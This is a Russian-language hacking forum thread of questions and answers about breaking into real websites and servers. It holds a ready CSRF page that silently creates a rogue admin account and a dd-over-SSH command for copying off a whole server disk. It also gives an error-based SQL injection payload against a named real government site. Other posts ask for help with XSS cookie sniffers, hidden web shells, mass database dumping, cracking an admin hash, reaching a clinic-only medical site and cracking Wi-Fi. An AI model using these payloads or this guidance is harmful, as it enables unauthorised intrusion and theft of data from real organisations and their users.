Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть: PHP: <html><head><title>CSRF</title></head> <body onload='document.forms.csrf.submit();'> <form action="http://site/cp/newuser/" name="csrf" method="POST" target="iframe"> <input type="hidden" name="login" value="hack"> <input type="hidden" name="newp" value="hack"> <input type="hidden" name="newp1" value="hack"> </form> <iframe src="" style="display:none;" name="iframe" id="iframe"></iframe> </body></html>
Имеется root на сервере Spoiler: info server Code: root@server:# uname -a Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux root@server:# df -h Filesystem Size Used Avail Use% Mounted on udev 490M 0 490M 0% /dev tmpfs 100M 11M 89M 11% /run /dev/vda1 30G 18G 12G 60% / tmpfs 497M 0 497M 0% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 497M 0 497M 0% /sys/fs/cgroup tmpfs 100M 0 100M 0% /run/user/0 root@server:# lsblk -a NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT vda 253:0 0 30G 0 disk └─vda1 253:1 0 30G 0 part / loop0 7:0 0 0 loop loop1 7:1 0 0 loop loop2 7:2 0 0 loop loop3 7:3 0 0 loop loop4 7:4 0 0 loop loop5 7:5 0 0 loop loop6 7:6 0 0 loop loop7 7:7 0 0 loop Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)? И скачать налету упакованный образ/архив (при условии если места не хватит) В последствии поднять данный образ в VM
Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH: Code: dd if=/dev/vda | ssh [email protected] -p22 "cat > vda_image" А потом гуглить "dd image to vm" и пробовать заводить этот образ
Ранее с таким не сталкивался, потому вопрос может быть очень глупым ))) Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый) "cat > vda_image" я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh [email protected] -p22 "cat > /root/folder_on_my_computer/vda_image_file" Я верно понял? P.S> как узнать предположительный размер конечного файла? Дабы решить на какую удаленную лить (место не резиновое =) )
смонтируй директорию(хоть корень) через sshfs Code: sshfs user@hostname:/remote/path /sshfs_local_folder и работай как с локальной системой, tar там или ещё чего, создать iso можно так Code: mkisofs -lJR -o output_image.iso sshfs_local_folder по идее должно работать
Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1 имеет размер 30G, образ будет такого же размера. Можно ещё попутно жать gzip-ом, размер должен быть меньше.
Цветные, помогите Code: http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Code: detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- - Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!
Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.
там всё что после /**/ как будто не уходит в запрос ?id=248/**/werwer - валидная страница ?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает
Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
для "Union Base" у меня error base да и если бы уязвимость была union я бы и мапом наверное в один клик слил Может там шел можно как то залить, я ни разу этого не делал
Привет всем! Сразу извините за тупой вопрос. Мб я пишу не в ту тему. Вообщем проблема такова , есть сайт medstat.*uva.ru ( *t )который можно войти только через сеть поликлиники, а через любую другую сеть никак не могу вломиться,пробывал VPN,TOR,ПРОКСИ не помогает. Как войти на этот сайт?
Ребят подскажите или помогите 1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе 2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров 3. Стал смотреть --is-dba , оказалось false 4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет 5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает 6. искал пхпмайадмин ,поиски ничего не дали Задача сдампить Вопрос: как ?)
С андройда при помощи csploit наловил трафика и сохранил в pcap . Юзнул Wireshark и с помощью фильтра : wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol отделил от мусора . Дальше в мануале было сказано запустить Elcomsoft Wireless Security Auditor закинуть наш отсортированный файл и атаковать . Когда начинаю закидывать файл EWSA начинает ругаться , что файл либо не того формата либо в нем нет того что нужно . Вопрос что же я делаю неправильно ? =(
